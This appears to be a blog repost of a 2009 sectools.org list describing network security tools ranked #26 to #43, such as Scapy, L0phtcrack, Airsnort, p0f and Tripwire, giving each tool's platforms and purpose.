</td></tr></tbody></table><hr /><a name="cheops"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#75</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">8</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <img src="http://mirror.sectools.org/logos/cheops-80x19.png" align="right" border="0" width="80" height="19" /> <a href="http://www.marko.net/cheops/">cheops</a> / <a href="http://cheops-ng.sourceforge.net/">cheops-ng</a> : Gives a simple interface to many network utilities, maps local or remote networks and identifies OS of machines<br />Cheops provides the functionality of many network utilities through a comfortable, powerful GUI. It has host/network discovery functionality as well as OS detection of hosts. Cheops-ng has the ability to probe hosts to see what services they are running. On some services, cheops-ng is actually able to see what program is running for a service and the version number of that program. The original Cheops program is currently not being developed or maintained so users are advised to use cheops-ng. </td></tr></tbody></table>Praba.... 
a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-44722631667381916452009-07-29T05:25:00.001-07:002009-07-29T05:25:40.254-07:00Top 100 Network Security Tools 26-50<p>Welcome to page 2 of the top network security tools site, covering tools ranked #26-50. Survey methodology and icon descriptions can be found on <a href="http://sectools.org/index.html">page 1</a>. <a name="perl-python"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#26</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.perl.org/">Perl</a> / <a href="http://www.python.org/">Python</a> / <a href="http://www.ruby-lang.org/">Ruby</a> : Portable, general-purpose scripting languages<br />While many canned security tools are available on this site for handling common tasks, scripting languages allow you to write your own (or modify existing ones) when you need something more custom. Quick, portable scripts can test, exploit, or even fix systems. 
Archives like <a href="http://www.cpan.org/">CPAN</a> are filled with modules such as <a href="http://www.ic.al.lg.ua/%7Eksv/">Net::RawIP</a> and protocol implementations to make your tasks even easier. </td></tr></tbody></table></p><hr /><a name="l0phtcrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#27</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">8</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.l0phtcrack.com/"><img src="http://mirror.sectools.org/logos/l0phtcrack-64x64.gif" align="right" border="0" width="64" height="64" /></a> <a href="http://www.l0phtcrack.com/">L0phtcrack</a> : Windows password auditing and recovery application<br />L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and <a href="http://www.l0phtcrack.com/">reborn as LC6 in 2009</a>. For free alternatives, consider <a href="http://ophcrack.sourceforge.net/">Ophcrack</a>, <a href="http://sectools.org/index.html#cain">Cain and Abel</a>, or <a href="http://sectools.org/index.html#john">John the Ripper</a>. 
<p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="scapy"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#28</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.secdev.org/projects/scapy/">Scapy</a> : Interactive packet manipulation tool<br />Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. 
<p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="sam"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#29</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">16</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.samspade.org/ssw/">Sam Spade</a> : Freeware Windows network query tool<br />Sam Spade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more. Non-Windows users can enjoy online versions of many of their tools. 
</td></tr></tbody></table><hr /><a name="gnupg-pgp"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#30</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.gnupg.org/">GnuPG</a> / <a href="http://www.pgp.com/">PGP</a> : Secure your files and communication w/advanced encryption<br />PGP is the famous encryption program by Phil Zimmermann which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses. 
<p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="airsnort"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#31</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://airsnort.shmoo.com/"><img src="http://mirror.sectools.org/logos/airsnort-80x41.png" align="right" border="0" width="80" height="41" /></a> <a href="http://airsnort.shmoo.com/">Airsnort</a> : 802.11 WEP Encryption Cracking Tool<br />AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the <a href="http://www.shmoo.com/">Shmoo Group</a> and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar <a href="http://sectools.org/index.html#aircrack">Aircrack</a>. 
<p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="backtrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#32</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.remote-exploit.org/index.php/BackTrack"><img src="http://mirror.sectools.org/logos/backtrack-80x76.png" align="right" border="0" width="80" height="76" /></a> <a href="http://www.remote-exploit.org/index.php/BackTrack">BackTrack</a> : An Innovative Penetration Testing live Linux distribution<br />This excellent bootable live-CD Linux distribution comes from the merger of Whax and Auditor. It boasts a huge variety of Security and Forensics tools and provides a rich development environment. User modularity is emphasized so the distribution can be easily customized by the user to include personal scripts, additional tools, customized kernels, etc. 
<p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="p0f"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#33</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://lcamtuf.coredump.cx/p0f.shtml"><img src="http://mirror.sectools.org/logos/p0f-80x99.png" align="right" border="0" width="80" height="99" /></a> <a href="http://lcamtuf.coredump.cx/p0f.shtml">P0f</a> : A versatile passive OS fingerprinting tool<br />P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall. P0f does not generate ANY additional network traffic, direct or indirect. No name lookups, no mysterious probes, no ARIN queries, nothing. In the hands of advanced users, P0f can detect firewall presence, NAT use, existence of load balancers, and more! 
<p>See all <a href="http://sectools.org/os-detectors.html">OS detection tools</a> </p></td></tr></tbody></table><hr /><a name="google"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#34</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.google.com/"><img src="http://mirror.sectools.org/logos/google-80x32.png" align="right" border="0" width="80" height="32" /></a> <a href="http://www.google.com/">Google</a> : Everyone's Favorite Search Engine<br />While it is far more than a security tool, Google's massive database is a gold mine for security researchers and penetration testers. You can use it to dig up information about a target company by using directives such as “site:target-domain.com” and find employee names, sensitive information that they wrongly thought was hidden, vulnerable software installations, and more. Similarly, when a bug is found in yet another popular webapp, Google can often provide a list of vulnerable servers worldwide within seconds. The master of Google hacking is <a href="http://johnny.ihackstuff.com/">Johnny Long</a>. 
Check out his <a href="http://johnny.ihackstuff.com/">Google Hacking Database</a> or his excellent book: <a href="http://www.amazon.com/dp/1597491764?tag=secbks-20">Google Hacking for Penetration Testers</a>. </td></tr></tbody></table><hr /><a name="webscarab"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#35</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"><img src="http://mirror.sectools.org/logos/webscarab-80x87.png" align="right" border="0" width="80" height="87" /></a> <a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab</a> : A framework for analyzing applications that communicate using the HTTP and HTTPS protocols<br />In its simplest form, WebScarab records the conversations (requests and responses) that it observes, and allows the operator to review them in various ways. 
WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="ntop"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#36</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.ntop.org/"><img src="http://mirror.sectools.org/logos/ntop-80x42.png" align="right" border="0" width="80" height="42" /></a> <a href="http://www.ntop.org/">Ntop</a> : A network traffic usage monitor<br />Ntop shows network usage in a way similar to what top does for processes. 
In interactive mode, it displays the network status on the user's terminal. In Web mode, it acts as a Web server, creating an HTML dump of the network status. It sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric monitoring applications, and RRD for persistently storing traffic statistics. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a>, and <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="tripwire"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#37</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">22</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.tripwire.com/"><img src="http://mirror.sectools.org/logos/tripwire-80x30.png" align="right" border="0" width="80" height="30" /></a> <a href="http://www.tripwire.com/">Tripwire</a> : The grand-daddy of file 
integrity checkers<br />A file and directory integrity checker. Tripwire is a tool that aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. Traditionally an open source tool, Tripwire Corp is now focused on their commercial enterprise configuration control offerings. An open source Linux version can still be found at <a href="http://sourceforge.net/projects/tripwire/">SourceForge</a>. UNIX users may also want to consider <a href="http://www.cs.tut.fi/%7Erammer/aide.html">AIDE</a>, which has been designed to be a free Tripwire replacement. Or you may wish to investigate <a href="http://www.radmind.org/">Radmind</a>, <a href="http://sectools.org/tools3.html#rkhunter">RKHunter</a>, or <a href="http://sectools.org/tools3.html#chkrootkit">chkrootkit</a>. Windows users may like <a href="http://technet.microsoft.com/en-us/sysinternals/bb897445.aspx">RootkitRevealer</a> from <a href="http://sectools.org/index.html#sysinternals">Sysinternals</a>. 
<p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="ngrep"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#38</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.packetfactory.net/projects/ngrep/">Ngrep</a> : Convenient packet matching & display<br />ngrep strives to provide most of GNU grep's common features, applying them to the network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular or hexadecimal expressions to match against data payloads of packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands bpf filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop. 
<p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a>, and <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="nbtscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#39</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">10</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.inetcat.net/software/nbtscan.html">Nbtscan</a> : Gathers NetBIOS info from Windows networks<br />NBTscan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts). It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address. 
The <a href="http://www.inetcat.net/software/nbtscan.html">original nbtscan</a> was written by Alla Bezroutchko. Steve Friedl has written an <a href="http://unixwiz.net/tools/nbtscan.html">alternate implementation</a>. <p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="webinspect"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#40</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.spidynamics.com/products/webinspect/"><img src="http://mirror.sectools.org/logos/webinspect-80x13.png" align="right" border="0" width="80" height="13" /></a> <a href="http://www.spidynamics.com/products/webinspect/">WebInspect</a> : A Powerful Web Application Scanner<br />SPI Dynamics' WebInspect application security assessment tool helps identify known and unknown vulnerabilities within the Web application layer. WebInspect can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more. 
<p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="openssl"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#41</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">3</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.openssl.org/"><img src="http://mirror.sectools.org/logos/openssl-80x24.png" align="right" border="0" width="80" height="24" /></a> <a href="http://www.openssl.org/">OpenSSL</a> : The premier SSL/TLS encryption library<br />The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation. 
<p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="xprobe2"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#42</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">9</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.sys-security.com/index.php?page=xprobe"><img src="http://mirror.sectools.org/logos/xprobe2-80x108.png" align="right" border="0" width="80" height="108" /></a> <a href="http://www.sys-security.com/index.php?page=xprobe">Xprobe2</a> : Active OS fingerprinting tool<br />XProbe is a tool for determining the operating system of a remote host. They do this using some of the <a href="http://insecure.org/nmap/osdetect/">same techniques</a> as <a href="http://insecure.org/nmap/">Nmap</a> as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach. 
<p>See all <a href="http://sectools.org/os-detectors.html">OS detection tools</a> </p></td></tr></tbody></table><hr /><a name="etherape"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#43</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">21</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://etherape.sourceforge.net/"><img src="http://mirror.sectools.org/logos/etherape-48x48.png" align="right" border="0" width="48" height="48" /></a> <a href="http://etherape.sourceforge.net/">EtherApe</a> : EtherApe is a graphical network monitor for Unix modeled after etherman<br />Featuring link layer, IP and TCP modes, EtherApe displays network activity graphically with a color coded protocols display. Hosts and links change in size with traffic. It supports Ethernet, FDDI, Token Ring, ISDN, PPP and SLIP devices. It can filter traffic to be shown, and can read traffic from a file as well as live from the network. 
